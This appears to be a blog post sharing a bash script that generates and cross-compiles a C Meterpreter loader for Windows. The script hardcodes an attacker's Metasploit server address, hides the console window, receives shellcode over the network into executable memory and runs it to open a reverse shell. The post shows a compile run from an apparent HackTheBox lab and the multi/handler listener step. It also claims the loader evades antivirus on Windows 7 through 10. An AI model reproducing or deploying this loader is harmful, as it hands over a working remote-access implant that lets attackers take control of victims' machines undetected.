This sounds crazy, but I have thought of improving a little an already well made code for meterpreter-loader for Windows targets. Based on the work from Raphael Mudge I have decided to create a little C source code generator that would include hardcoded IP address and port number for our Metasploit server. While the original concept is very good, some automation would be nice. The original article is here : blog.strategiccyber.com/2012/09/13/a-loader-for-metasploits-meterpreter/
The original source code on Github is here : github.com/rsmudge/metasploit-loader
My modifications are simple, I have added a hardcoded unsigned char variables that get placed into the source code, so that when the final binary gets executed it silently connects to the Metasploit server and loads your favorite windows reverse_tcp payload.
Lets get customized !
Here is the code, you can place the shellscript anywhere, just make sure you have mingw installed on your linuxbox.
#!/bin/bash clear echo "****************************************************************" echo " Automatic C source code generator - FOR METASPLOIT " echo " Based on rsmudge metasploit-loader " echo "****************************************************************" echo -en 'Metasploit server IP : ' read ip echo -en 'Metasploit port number : ' read port echo '#include <stdio.h>'> temp.c echo '#include <stdlib.h>' >> temp.c echo '#include <windows.h>' >> temp.c echo '#include <winsock2.h>' >> temp.c echo -n 'unsigned char server[]="' >> temp.c echo -n $ip >> temp.c echo -n '";' >> temp.c echo '' >> temp.c echo -n 'unsigned char serverp[]="' >> temp.c echo -n $port >> temp.c echo -n '";' >> temp.c echo '' >> temp.c echo 'void winsock_init() {' >> temp.c echo ' WSADATA wsaData;' >> temp.c echo ' WORD wVersionRequested;' >> temp.c echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c echo ' printf("ws2_32.dll is out of date.\n"); '>> temp.c echo ' WSACleanup(); '>> temp.c echo ' exit(1);'>> temp.c echo ' }' >> temp.c echo ' }' >> temp.c echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c echo ' printf("Bad things: %s\n", error);'>> temp.c echo ' closesocket(my_socket);'>> temp.c echo ' WSACleanup();'>> temp.c echo ' exit(1);' >> temp.c echo ' }' >> temp.c echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c echo ' int tret = 0;'>> temp.c echo ' int nret = 0;'>>temp.c echo ' void * startb = buffer;'>> temp.c echo ' while (tret < len) {'>>temp.c echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c echo ' startb += nret;'>> temp.c echo ' tret += nret;'>>temp.c echo ' if (nret == SOCKET_ERROR)'>> temp.c echo ' punt(my_socket, "Could not receive data");'>> temp.c echo ' }'>>temp.c echo ' return tret;'>> temp.c echo '}' >> temp.c echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c echo ' struct hostent * target;' >> temp.c echo ' struct sockaddr_in sock;' >> temp.c echo ' SOCKET my_socket;'>>temp.c echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c echo ' if (my_socket == INVALID_SOCKET)'>> temp.c echo ' punt(my_socket, ".");'>>temp.c echo ' target = gethostbyname(targetip);'>>temp.c echo ' if (target == NULL)'>>temp.c echo ' punt(my_socket, "..");'>>temp.c echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c echo ' sock.sin_family = AF_INET;'>> temp.c echo ' sock.sin_port = htons(port);'>>temp.c echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c echo ' punt(my_socket, "...");'>>temp.c echo ' return my_socket;'>>temp.c echo '}' >> temp.c echo 'int main(int argc, char * argv[]) {' >> temp.c echo ' FreeConsole();'>>temp.c echo ' ULONG32 size;'>>temp.c echo ' char * buffer;'>>temp.c echo ' void (*function)();'>>temp.c echo ' winsock_init();'>> temp.c echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c echo ' if (count != 4 || size <= 0)'>>temp.c echo ' punt(my_socket, "read a strange or incomplete length value\n");'>>temp.c echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c echo ' if (buffer == NULL)'>>temp.c echo ' punt(my_socket, "could not allocate buffer\n");'>>temp.c echo ' buffer[0] = 0xBF;'>>temp.c echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c echo ' function = (void (*)())buffer;'>>temp.c echo ' function();'>>temp.c echo ' return 0;'>>temp.c echo '}' >> temp.c echo 'Compiling binary ..' i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 ls -la payload.exe
root@kali:~/htb# ./mploadercreate.sh **************************************************************** Automatic C source code generator - FOR METASPLOIT Based on rsmudge metasploit-loader **************************************************************** Metasploit server IP : 10.10.14.10 Metasploit port number : 443 Compiling binary .. In file included from temp.c:4: /usr/share/mingw-w64/include/winsock2.h:15:2: warning: #warning Please include winsock2.h before windows.h [-Wcpp] #warning Please include winsock2.h before windows.h ^~~~~~~ -rwxr-xr-x 1 root root 292503 Jan 31 04:18 payload.exe root@kali:~/htb# file payload.exe payload.exe: PE32 executable (console) Intel 80386, for MS Windows
Then listen with : msfconsole multi/handler , and also load your listener with your favorite reverse TCP payload. So far I have tested this on Win7 32bit, Win7 64bit, Win8 64bit and Win10 64bit, it bypasses AVs fine.
refence used : https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
Enjoy…